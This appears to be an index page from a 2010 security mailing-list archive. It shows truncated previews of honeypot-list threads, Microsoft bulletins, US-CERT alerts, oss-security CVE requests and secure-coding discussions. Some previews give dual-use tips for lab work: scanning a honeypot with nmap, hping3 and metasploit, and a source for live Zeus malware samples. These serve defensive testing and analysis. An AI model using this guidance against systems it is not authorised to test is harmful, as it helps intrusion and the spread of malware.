of the tools you need - just point stuff like nmap and nessus at your honeypot
and see if your WAF notices. If it doesn't notice you doing the nmap, it won't
notice an attacker doing the nmap. If you have hping3, try sending a few
christmas-tree packets at your honeypot, see what happens. Get a copy of
metasploit and...

honeypot needed for waf testing false (Aug 23)
I need to test my WAF. I want to set up a simple network in the lab like this:
XP or Linux client <--> WAF <--> Honeypot/test webserver

1) Does anyone have any suggestions on what I can use to simulate/generate attacks/suspicous traffic towards the
weberver from my client?

2) Is there a honeypot image out there that I can download that would be good to be the role of my test
webserver?

Any suggestions or ideas are very much...

Ruxcon 2010 Final Call For Papers cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!

This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!

HITB CFP: http://cfp.hackinthebox.org/

===

Venue: Crowne Plaza Mutiara Kuala Lumpur...

[HITB-Announce] HITB Magazine Issue 003 + HITBSecConf2010 - Amsterdam Hafez Kamal (Jul 04)
Our first ever HITBSecConf in Europe is over! A big big thank you to all
our sponsors, speakers, crew, volunteers and of course attendees who
made it over to join us!!!

We're already planning for 2011 and the tentative timing for the HITB
Europe is mid May (stay tuned to our @hitbsecconf twitter stream for all
conference updates).

All conference materials from the event can be downloaded from...

CFP: Deadline Extended: SLAML'10 Mohror, Kathryn (Jun 16)
Workshop on Managing Systems via Log Analysis and Machine
Learning Techniques (SLAML '10)

=============================================
October 2-3, 2010
Vancouver, BC, Canada
(at OSDI)
http://www.usenix.org/events/slaml10/cfp/
=============================================

********...

[HITB-Announce] HITBSecConf2010 - Malaysia Call for Papers Hafez Kamal (May 19)
The Call for Papers for HITB Security Conference 2010 Malaysia is now open!

Talks that are more technical or that discuss new and never before seen
attack methods are of more interest than a subject that has been covered
several times before. Submissions are due no later than 9th August 2010.

HITB CFP: http://cfp.hackinthebox.org/

===

Date: October 11th - 14th 2010
Venue: Crowne Plaza Mutiara Kuala Lumpur

Keynote 1: Chris Wysopal...

RE: info reg Zeus bot detection and analysis Younger Tyler (May 19)
Any tips on how to selectively get infected with Zeus?

You can find the latest Zeus variants here http://www.malwaredomainlist.com/mdl.php

Tyler

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Michele Zoerb
Sent: Wednesday, May 19, 2010 11:39 AM
To: Mayank.2.Bhatnagar; honeypot honeypot
Subject: RE: info reg Zeus bot detection and analysis

Interesting thoughts as I am just...

RE: info reg Zeus bot detection and analysis Gary Derania (May 19)
------Original Message------
From: "Michele Zoerb" <mzoerb () the41 com>
To: "Mayank.2.Bhatnagar" <MBhatnagar () ipolicynetworks com>"honeypot honeypot" <honeypots () securityfocus com>
Sent: Wed 2010-05-19 08:48
Subject: RE: info reg Zeus bot detection and analysis

Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I...

RE: info reg Zeus bot detection and analysis Michele Zoerb (May 19)
Interesting thoughts as I am just starting the same type of project. I want to get infected by Zeus and perform some
analysis. I have a closed environment, but didn't think that detecting a virtual environment would be an issue for the
bot. I will put my VMconverter onto a separate machine and clone from there.

Any tips on how to selectively get infected with Zeus?

Thanks,
Chele

-----Original Message-----
From: listbounce () securityfocus...

info reg Zeus bot detection and analysis Mayank.2.Bhatnagar (May 19)
Hi everyone,

We are able to collect several samples of Zeus bot and there are many variants of the same.
However when we try to analyse it in our sandbox and closed environment, we are not able to get any activity.
There are several reports available, which are for same md5sum sample but still after much of analysis and triggering
attempts, either the malicious sample dosnt trigger or if it does, it doesn't show any network activity.

What...

[HITB-Announce] HITB eZine Issue 002 out now! Hafez Kamal (Apr 23)
The second quarterly HITB eZine (issue 002) has been released! Grab your
copies from here:

https://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=35995

===

3 months ago, our newly 'reborn' ezine was a completely new experience
to our small team and we didn't expect it to have a lot of followers
considering its absence for many years. But to our surprise, we received
over 20K downloads just weeks after its...

[HITB-Announce] FINAL CALL - CFP for HITBSecConf2010 Amsterdam Hafez Kamal (Apr 08)
This is the FINAL CALL to submit your talk / presentation proposals for
the inaugural HITB Security Conference in Europe! Submissions are due
by 19TH APRIL 2010.

HITBSecConf2010 - Amsterdam takes place at the Grand Krasnapolsky from
the 29th of June till the 2nd of July (Tuesday - Friday) with keynote
speakers Anton Chuvakin and Mark Curphey in our _first ever_ QUAD TRACK
conference.

To submit your presentation proposals and for further details...

Microsoft Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products—note how most have a prominent and often-misleading "mitigating factors" section.

Microsoft Security Bulletin Minor Revisions Microsoft (Sep 01)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: September 1, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-056 - Critical
* MS10-049 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Advisory Notification Microsoft (Aug 31)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 31, 2010
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 25)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 25, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-056 - Critical
* MS10-054 - Critical

Bulletin Information:
=====================

*...

Microsoft Security Bulletin Minor Revision Microsoft (Aug 24)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: August 24, 2010
********************************************************************

Summary
=======
The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-046 - Critical

Bulletin Information:
=====================

* MS10-046 - Critical

-...

Microsoft Security Advisory Notification Microsoft (Aug 23)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 23, 2010
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (2269637)
- Title: Insecure Library Loading Could Allow Remote
Code Execution
-...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 18, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-058 - Important

Bulletin Information:
=====================

* MS10-058 - Important...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 11)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 11, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-060 - Critical
* MS10-057 - Important
* MS10-056 - Critical
* MS10-054 - Critical...

Microsoft Security Advisory Notification Microsoft (Aug 10)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: August 10, 2010
********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (977377)
- Title: Vulnerability in TLS/SSL Could Allow Spoofing
-...

Microsoft Security Bulletin Summary for August 2010 Microsoft (Aug 10)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 10, 2010
********************************************************************

This bulletin summary lists security bulletins released for
August 2010.

The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at
http://www.microsoft.com/technet/security/bulletin/ms10-aug.mspx....

Microsoft Security Bulletin Advance Notification for August 2010 Microsoft (Aug 05)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: August 5, 2010
********************************************************************

This is an advance notification of security bulletins that
Microsoft is intending to release on August 10, 2010.

The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be found at...

Microsoft Security Bulletin Minor Revisions Microsoft (Aug 03)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 3, 2010
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS10-046 - Critical

Bulletin Information:
=====================

* MS10-046 - Critical

-...

Microsoft Security Bulletin Summary for August 2010 Microsoft (Aug 02)
********************************************************************
Microsoft Security Bulletin Summary for August 2010
Issued: August 2, 2010
********************************************************************

This bulletin summary lists the out-of-band security bulletin
released on August 2, 2010.

The full version of the Microsoft Security Bulletin Summary for
August 2010 can be found at...

Microsoft Security Bulletin Advance Notification for August 2010 Microsoft (Jul 30)
********************************************************************
Microsoft Security Bulletin Advance Notification for August 2010
Issued: July 30, 2010
********************************************************************

This is an advance notification of one out-of-band security bulletin
that Microsoft is intending to release on August 2, 2010.

The full version of the Microsoft Security Bulletin Advance
Notification for August 2010 can be...

Microsoft Security Bulletin Minor Revision Microsoft (Jul 21)
********************************************************************
Title: Microsoft Security Bulletin Minor Revision
Issued: July 21, 2010
********************************************************************

Summary
=======
The following bulletin has undergone a minor revision increment.

* MS09-014 - Critical

Bulletin Information:
=====================

* MS09-014 - Critical

-...

Microsoft Security Advisory Notification Microsoft (Jul 20)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: July 20, 2010
********************************************************************

Security Advisory Updated Today

==============================================

* Microsoft Security Advisory (2286198)
- Title: Vulnerability in Windows Shell Could Allow
Remote Code Execution
-...

Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community

CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, tips, and current activity lists.

Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications Current Activity (Sep 01)
US-CERT Current Activity

Insecure Loading of Dynamic Link Libraries in Windows Applications

Original release date: August 25, 2010 at 12:01 pm
Last revised: September 1, 2010 at 10:27 am

US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...

Current Activity - VMware Releases Updates for ESX Service Console Packages Current Activity (Sep 01)
US-CERT Current Activity

VMware Releases Updates for ESX Service Console Packages

Original release date: September 1, 2010 at 9:32 am
Last revised: September 1, 2010 at 9:32 am

VMware has released security updates for multiple third party packages
for the ESX Service Console. These updates address vulnerabilities in
the perl, krb5, samba, tar, and cpio packages. Exploitation of these
vulnerabilities may allow an attacker to execute arbitrary...

Current Activity - RealNetworks Releases Update to Address Vulnerabilities in RealPlayer Current Activity (Aug 31)
US-CERT Current Activity

RealNetworks Releases Update to Address Vulnerabilities in RealPlayer

Original release date: August 31, 2010 at 8:23 am
Last revised: August 31, 2010 at 8:23 am

RealNetworks, Inc. has released an update for RealPlayer to address
multiple vulnerabilities. These vulnerabilities may allow a remote,
unauthenticated attacker to execute arbitrary code or obtain sensitive
information.

US-CERT encourages users and...

Current Activity - Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol Current Activity (Aug 31)
US-CERT Current Activity

Cisco Releases Security Advisory for IOS XR Software Border Gateway Protocol

Original release date: August 31, 2010 at 8:40 am
Last revised: August 31, 2010 at 8:40 am

Cisco has released a security advisory to address a vulnerability in
the Cisco IOS XR Software Border Gateway Protocol feature.
Exploitation of this vulnerability may result in the continuous
resetting of BGP peering sessions, which may cause a...

TA10-238A -- Microsoft Windows Insecurely Loads Dynamic Libraries US-CERT Technical Alerts (Aug 26)
National Cyber Alert System

Technical Cyber Security Alert TA10-238A

Microsoft Windows Insecurely Loads Dynamic Libraries

Original release date: August 26, 2010
Last revised: --
Source: US-CERT

Systems Affected

Any application running on the Microsoft Windows platform that
uses dynamically linked libraries (DLLs) may be affected. Whether
or not an application is vulnerable depends on...

Current Activity - Cisco Releases Advisories for Unified Communications Manager and Unified Presence Current Activity (Aug 25)
US-CERT Current Activity

Cisco Releases Advisories for Unified Communications Manager and Unified Presence

Original release date: August 25, 2010 at 1:53 pm
Last revised: August 25, 2010 at 1:53 pm

Cisco has released security advisories to address multiple
vulnerabilities affecting Unified Communications Manager and Unified
Presence.

These vulnerabilities affect the processing of Session Initiation
Protocol (SIP) messages. Exploitation of...

Current Activity - APWG Fax Back Phishing Education Program Current Activity (Aug 25)
US-CERT Current Activity

APWG Fax Back Phishing Education Program

Original release date: August 25, 2010 at 1:16 pm
Last revised: August 25, 2010 at 1:16 pm

In an effort to respond to a growing public threat by offline phishers
that conduct various scams via fax, the Anti-phishing Working Group
(APWG) has partnered with the Internal Revenue Service (IRS) to create
the APWG Fax Back Phishing Education Program. This program is designed
to...

Current Activity - Insecure Loading of Dynamic Link Libraries in Windows Applications Current Activity (Aug 25)
US-CERT Current Activity

Insecure Loading of Dynamic Link Libraries in Windows Applications

Original release date: August 25, 2010 at 12:01 pm
Last revised: August 25, 2010 at 12:01 pm

US-CERT is aware of a class of vulnerabilities related to how some
Windows applications may load external dynamic link libraries (DLLs).
When an application loads a DLL without specifying a fully qualified
path name, Windows will attempt to locate the DLL by...

Cyber Security Tip ST05-014 -- Real-World Warnings Keep You Safe Online US-CERT Security Tips (Aug 25)
Cyber Security Tip ST05-014
Real-World Warnings Keep You Safe Online

Many of the warning phrases you probably heard from your parents and
teachers are also applicable to using computers and the internet.

Why are these warnings important?

Like the real world, technology and the internet present dangers as well as
benefits. Equipment fails, attackers may target you, and mistakes and poor...

Current Activity - Adobe Releases Security Bulletin for Shockwave Player Current Activity (Aug 25)
US-CERT Current Activity

Adobe Releases Security Bulletin for Shockwave Player

Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am

Adobe has released a security update to address multiple
vulnerabilities affecting Shockwave Player 11.5.7.609 and earlier
versions. These vulnerabilities may allow an attacker to execute
arbitrary code.

US-CERT encourages users and administrators to review Adobe security...

Current Activity - Apple Releases Security Update 2010-005 Current Activity (Aug 25)
US-CERT Current Activity

Apple Releases Security Update 2010-005

Original release date: August 25, 2010 at 8:15 am
Last revised: August 25, 2010 at 8:15 am

Apple has released security update 2010-005 to address multiple
vulnerabilities affecting the ATS, CFNetwork, ClamAV, CoreGraphics,
libsecurity, PHP, and Samba applications. These vulnerabilities may
allow an attacker to execute arbitrary code, obtain sensitive
information, cause a...

Current Activity - Microsoft Releases Security Advisory Current Activity (Aug 24)
US-CERT Current Activity

Microsoft Releases Security Advisory

Original release date: August 24, 2010 at 11:42 am
Last revised: August 24, 2010 at 11:42 am

Microsoft has released a security advisory indicating that it is aware
of a remote attack vector for a class of vulnerabilities related to
how applications load external dynamic link libraries (DLLs). If an
application does not securely load DLL files, an attacker may be able
to cause the...

Current Activity - Google Releases Chrome 5.0.375.127 Current Activity (Aug 20)
US-CERT Current Activity

Google Releases Chrome 5.0.375.127

Original release date: August 20, 2010 at 8:47 am
Last revised: August 20, 2010 at 8:47 am

Google has released Chrome 5.0.375.127 for Windows, Mac, and Linux to
address multiple vulnerabilities. These vulnerabilities may allow an
attacker to execute arbitrary code, cause a denial-of-service
condition, or conduct spoofing attacks.

US-CERT encourages users and administrators to review...

TA10-231A -- Adobe Reader and Acrobat Vulnerabilities US-CERT Technical Alerts (Aug 19)
National Cyber Alert System

Technical Cyber Security Alert TA10-231A

Adobe Reader and Acrobat Vulnerabilities

Original release date: August 19, 2010
Last revised: --
Source: US-CERT

Systems Affected

* Adobe Reader 9.3.3 and earlier versions for Windows, Macintosh, and UNIX
* Adobe Acrobat 9.3.3 and earlier versions for Windows and Macintosh
* Adobe Reader 8.2.3 and earlier versions...

Current Activity - Cisco IOS Software Vulnerability Current Activity (Aug 13)
US-CERT Current Activity

Cisco IOS Software Vulnerability

Original release date: August 13, 2010 at 8:22 am
Last revised: August 13, 2010 at 8:22 am

Cisco has released a security advisory to address a vulnerability
affecting IOS Software Release 1.5.1(2)T. This vulnerability may allow
an attacker to cause a denial-of-service condition by sending a
specially crafted packet through normal network traffic.

US-CERT encourages users and...

Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community

Re: CVE id request: libc fortify source information disclosure Dan Rosenberg (Sep 02)
I retract my previous statement - you're correct that the backtrace
also can reveal this same information. Perhaps this is an acceptable
risk, since I can't think of a single real-life case where this would
have actually been useful to an attacker (although it's not too hard
to imagine such a situation). Or perhaps printing out any of this
information to unprivileged users running suid applications should be
reconsidered.

-Dan

Re: CVE id request: libc fortify source information disclosure Tomas Hoger (Sep 02)
In case of stack protector failed check, it's still an attempt to
print-out info based on what's known to be (partially) corrupted.

Re: CVE id request: libc fortify source information disclosure Dan Rosenberg (Sep 02)
Tomas,

You are correct. Both the __stack_chk_fail(), which is inserted due
to stack protection, and the more general __chk_fail(), which is
inserted due to FORTIFY_SOURCE and may trigger for static buffer
overflows in other segments, call out to the same __fortify_fail()
function to print out the stack trace.

The backtrace or memory map don't really contain any potentially
sensitive information that couldn't be obtained otherwise. It's just...

Re: CVE id request: libc fortify source information disclosure Tomas Hoger (Sep 02)
For the sake of correctness, protective technology that kicks in in the
Dan's example is stack protector, not FORTIFY_SOURCE. Though it's
probably still glibc to blame for using the same error-reporting
function in both cases.

It seems the fix would need to remove all possibly-useful info from the
error message.

CVE-2010-2960 kernel: keyctl_session_to_parent null ptr deref Eugene Teo (Sep 01)
Reported by Tavis Ormandy.

Patches (not in upstream yet):
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c4
https://bugzilla.redhat.com/show_bug.cgi?id=627440#c5

You might need to comment out all the pam_keyinit calls in /etc/pam.d/
to reproduce the problem if the version of the kernel you are using is
affected.

Introduced via upstream commit ee18d64c (v2.6.32-rc1).

References:
https://bugzilla.redhat.com/CVE-2010-2960...

Re: CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion) Josh Bressers (Sep 01)
Please use CVE-2010-2958

Thanks.

CVE Request -- phpMyAdmin - v3.6.6 -- XSS attack using debugging messages (CVE-2010-3056 discussion) Jan Lieskovsky (Sep 01)
Hi Steve, vendors,

on 2010-08-30 phpMyAdmin published PMASA-2010-6 addressing one XSS:
[1] http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php

Summary (from [1]):
XSS attack using debugging messages.
Description (from [1]):
It was possible to conduct a XSS attack using error messages in PHP backtrace.

Affected versions (from [1]):
For 3.x: versions before 3.3.6 are affected.
Branch 2.11.x is not...

CVE-2010-2954 kernel: irda null ptr deref Eugene Teo (Aug 31)
Reported by Taviso Ormandy.
Patch at: http://www.spinics.net/lists/netdev/msg139404.html.
References:
https://bugzilla.redhat.com/CVE-2010-2954
http://twitter.com/taviso/status/22635752128

Quick check, introduced in 61e44b48 (v2.6.24 and above).

Thanks, Eugene

Re: CVE Request: BGP protocol vulnerability Steven M. Christey (Aug 31)
The way Cisco has written up this CVE, they are clearly focusing on the
generation of corrupted attributes, not a protocol problem. So, I'd want
a separate CVE for the general BGP design issue.

I can't quite tell the difference between CVE-2009-2055 and what Florian
is requesting a CVE for. In CVE-2009-2055, Cisco seems to be implying
that it's a problem in XR, not the design of the whole protocol - but it's
not immediately clear if they...

Re: CVE id request: libc fortify source information disclosure Steven M. Christey (Aug 31)
I think this technically qualifies as an "exposure" which is the "E" in
"CVE" - it can be used as a stepping stone for exploitation of another
vulnerability. (Very old, unwieldy definitions here:
http://cve.mitre.org/about/terminology.html)

The risk may be very minimal, but the FORTIFY_SOURCE protection mechanism
is not working "as advertised" - it can be manipulated for an
admittedly-small...

Re: CVE id request: libc fortify source information disclosure Josh Bressers (Aug 31)
----- "Nico Golde" <oss-security+ml () ngolde de> wrote:

Steve,

What is MITRE policy on this one. By itself I question if this is a
security flaw, but it also would appear to have the potential to turn a DoS
into something worse.

I'm not sure what policy is in this instance.

Thanks.

Re: CVE request: serendipity < 1.5.4 xss Josh Bressers (Aug 31)
Please use CVE-2010-2957

Thanks.

Re: [PATCH] exec argument expansion can inappropriately triggerOOM-killer Tetsuo Handa (Aug 31)
Brad Spengler wrote:

As far as I know, RHEL >= 5.3 and Asianux >= 3.2 backported this functionality.

Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer Solar Designer (Aug 31)
Brad, Roland -

Thank you for your comments and your work on this.

Agreed.

Alexander

Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer Roland McGrath (Aug 31)
This can't be so. There are already many possibilities for preemption
in the get_user_pages code paths (called from get_arg_page).

Indeed, this too is a clear indication that preemption here is already safe.

What "change"? Preemption is already possible, that's nothing new.
The only difference is that we might notice TIF_SIGPENDING having been
set, and bail out either before or after prepare_binprm, and so never
call...

Secure Coding — The Secure Coding list (SC-L) is an open forum for the discussion on developing secure applications. It is moderated by the authors of Secure Coding: Principles and Practices.

Re: Recent technical reports from the CERT Secure Coding Initiative Jonathan Leffler (Aug 23)
Thanks for the reports, Robert.

Specifications for Managed Strings, Second Edition
Hal Burch, Fred Long, Raunak Rungta, Robert C. Seacord, & David Svoboda

CMU/SEI-2010-TR-018

This report describes a managed string library for the C programming
language. [...]

cover date: May 2010

http://www.sei.cmu.edu/library/abstracts/reports/10tr018.cfm

In the managed string library report, there's a paragraph on p5 that reads:...

[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN! Leonardo Buonsanti (Aug 23)
Greetings everyone!

We're proud to announce that the OWASP's AppSec Brazil 2010 Conference
registrations' are officially open!

Early bird offers are available! Hurry up!

This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!

Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration

All info about the event can be found at:...

SB53: Richard Bejtlich Gary McGraw (Aug 23)
hi sc-l,

The 53rd (!!) monthly episode of the Silver Bullet Security Podcast is an interview with Richard Bejtlich. Richard is
a well known expert in network monitoring, a subject he has written a book about. Richard is also very knowledgeable
about software security. In fact, I wish that more ops people knew as much as Richard does about software security!
Richard now works for GE and has plenty to say about interfacing with a huge...

Building Real Software: Has Static Analysis reached its limits? Kenneth Van Wyk (Aug 20)
FYI, nice write-up on the Fortify acquisition as well as the static code analysis space here:

http://swreflections.blogspot.com/2010/08/has-static-analysis-reached-its-limits.html

Cheers,

Ken

-----
Kenneth R. van Wyk
KRvW Associates, LLC
http://www.KRvW.com

Follow us on Twitter at: http://twitter.com/KRvW_Associates

Ruxcon 2010 Final Call For Papers cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

Software Security Crosses the Threshold Gary McGraw (Aug 17)
hi sc-l,

As many of you know, I have been collecting and publishing information about the software security space from a
business perspective for several years running. In 2009, revenues from tools and services companies in the software
security market exceeded $500 million. This is an important threshold for multiple reasons: the space continues to
grow even in uncertain economic times, a middle market of small and medium size businesses...

Re: Computerworld: Opinion - Making apps secure is hard work Gunnar Peterson (Aug 12)
Hi Ken,

You raise some important points. Most infosec is approached as a set of controls, but access control only takes you so
far in the face of malice.

I like this quote from G.K. Chesterton

"The real trouble with this world of ours is not that it is an unreasonable world, nor even that it is a reasonable
one. The commonest kind of trouble is that it is nearly reasonable, but not quite. Life is not an illogicality; yet it
is a trap...

Computerworld: Opinion - Making apps secure is hard work Kenneth Van Wyk (Aug 12)
I figured this was relevant here, so here's a link to my August column for Computerworld.

Excerpt:

'What's that you say? All the app vetting you've been doing to date consists only of verifying that the apps play by
the rules? That is, that they use only published APIs and such? Well, then, you really have your work cut out for you,
because that's not all that your customers expect.'

To read the complete article see:...

Secure code review/application penetration testing/security architecture positions at Cigital Joanne Gaitanis (Aug 12)
Good afternoon!

Due to rapid growth/increased client base, we are looking for Application Security Consultants (full time) at all
levels, from 1-20 years experience, from entry level to management.
If qualified and interested, send me your resume in MS WORD doc format to jgaitanis () cigital com
Peruse our website @ www.cigital.com<http://www.cigital.com> !
Must be willing to travel as needed (~25%).
Position Locations: New York City,...

Two resources Gary McGraw (Aug 09)
hi sc-l,

We just made the Richard Clarke Silver Bullet podcast transcript live. This special 50th edition of Silver Bullet
interview shows up in the July/August IEEE Security & Privacy magazine. A high definition video of the interview is
also available on the silver bullet web page. You can find a pdf copy of the transcript here:
http://www.cigital.com/silverbullet/shows/silverbullet-050-rclarke.pdf

Also of note, the mainstream...

2nd. OWASP Ibero-American Web-Applicati ons Security conference (IBWAS’10) - Call for Trai ning Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

**CALL FOR TRAINING SESSIONS**

IBWAS and OWASP is currently soliciting training proposals for the OWASP Ibero-American Web Applications Security 2010
Conference (IBWAS'10) which will take place at ISCTE-IUL, Lisboa, Portugal, on November 24 through November 26, 2010....

2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

Call for Papers

Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to developed new and flexible...

Re: Static code review for iPhone developers? Kenneth Van Wyk (Jul 29)
Thanks to all who responded. Great suggestions.

Most focused on the (now) built-in Clang analysis engine (and front-end for LLVM ) that Dan Cornell cited here.
(http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html)

Clang looks like a useful starting point, as it looks for all sorts of common mistakes found in the C family, including
C++ and Objective C. Memory leaks, uninitialized variables, type mismatches,...

Re: Static code review for iPhone developers? Dan Cornell (Jul 29)
XCode has a built in static analysis tool, but I'm not sure how thorough it is:
<http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html>

Not sure if any of the commercial folks support Objective-C yet.

Thanks,

Dan

Static code review for iPhone developers? Kenneth Van Wyk (Jul 29)
Greetings SC-L folks. Hey, I have a quick question I'd like to submit to this group.

Anyone know of any static code analysis tools that can scan an iPhone app package? Something that integrates with the
Xcode SDK and can at the very least scan through all of the Objective C in the src tree is what I'm looking for. Any
SCA product vendors currently doing this? Please contact me on or off list.

Cheers,

Ken

-----
Kenneth R. van Wyk
KRvW...

Educause Security Discussion — Securing networks and computers in an academic environment.

Re: Question about Endpoint Encryption SCHALIP, MICHAEL (Sep 02)
Actually - GuardianEdge has been purchased by Symantec - we just implemented it and it's actually working quite well!!
We like that we can interface the whole thing with Symantec/Altiris.....

In a previous life - we used Entrust, which also worked well - but it's a lot of work to get the key authority set up
right, especially if you are serving up to a nationwide customer set....

M

-----Original Message-----
From: The EDUCAUSE Security...

Re: Question about Endpoint Encryption Basgen, Brian (Sep 02)
We are also using Checkpoint. It has been a usable product that has worked for us on a fairly limited scale (250 high
risk machines), but it is not an enterprise product. They are trying to make it into an enterprise product via their
"security suite", but I think they are a few years away. That said, from the security side, I think it is one of the
better products out there. Last time we looked 2 years ago, many products out there...

Re: Question about Endpoint Encryption Jason Testart (Sep 02)
I'm about to roll-out SecureDoc by WinMagic. I've delayed our
deployment only because of usability issues on Windows 7/Vista. It has
a feature to synchronize the password for the encryption key (file) with
the operating system password that I am keen on using. It worked solid
with XP but had problems with Vista/7 (because of move from the GINA to
the "credential provider" model, I suppose). I just now have a version
that works...

Re: Question about Endpoint Encryption James Farr '05 (Sep 02)
I have looked at several vendors. I am concerned about laptops, but also so
removable media encryption. I see all the desktops out there and all those
flash drives, CDs and DVDs. The likelihood of finding out about a
lost/stolen $10 flash drive is much less than a $$$ laptop.

Right now the two vendors that are at the top of my list are Credant
Technologies and PGP. I will be interested others experience and what
solutions others are...

Re: Question about Endpoint Encryption Roger Safian (Sep 02)

FWIW we used to use Pointsec. It was a decent product, and I thought the
support we got from both

Pointsec and our local reseller was really first class. Once Pointsec was
bought by Checkpoint, things

Just went downhill fast.

This year we re-negotiated our anti-viral contract with Symantec. As part
of the negotiation we secured

A special price for the encryption product. It works better, has a nice
management interface, and, best

of...

Re: Question about Endpoint Encryption Hanson, Mike (Sep 02)
Gregory,

We use Checkpoint endpoint protection and I can say I do not recommend it.
The product was originally from Pointsec and they were a small and
responsive company with a decent product. Then Checkpoint bought them and it
has been more or less downhill since then. Checkpoint is supposedly doing a
complete rewrite of the product now to address problems. We currently have
three different versions of Checkpoint running, since each version is...

Re: Question about Endpoint Encryption Joel Rosenblatt (Sep 02)
Hi,

We are using GE and have not had these kinds of problems .. the only time we see failures is when there are underling
hardware problems or when the wrong
version of the product gets installed.

Your welcome to pick our brains (for what that is worth :-) - Let me know offline and I'll put you touch with my GE
expert.

Thanks,
Joel Rosenblatt

Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office...

Re: Question about Endpoint Encryption David Grisham (Sep 02)
Thank you Gregory,
We purchased McAfee Total Protection suite (endpoint encryption, DLP, device control). We wanted central control from
EPO. So we were sold and installed the latest Version 6. That version turned out to be really a version 1 rewrite and
our pilot found too many problems to deploy across the enterprise.
-- Also we were told we could use DLP with version 6 when we purchased. Turns out that feature won't be released until...

Cert Service Topic of September 14 InCommon Online Forum Valerie Vogel (Sep 02)
----------
InCommon Online Forum: The InCommon Cert Service
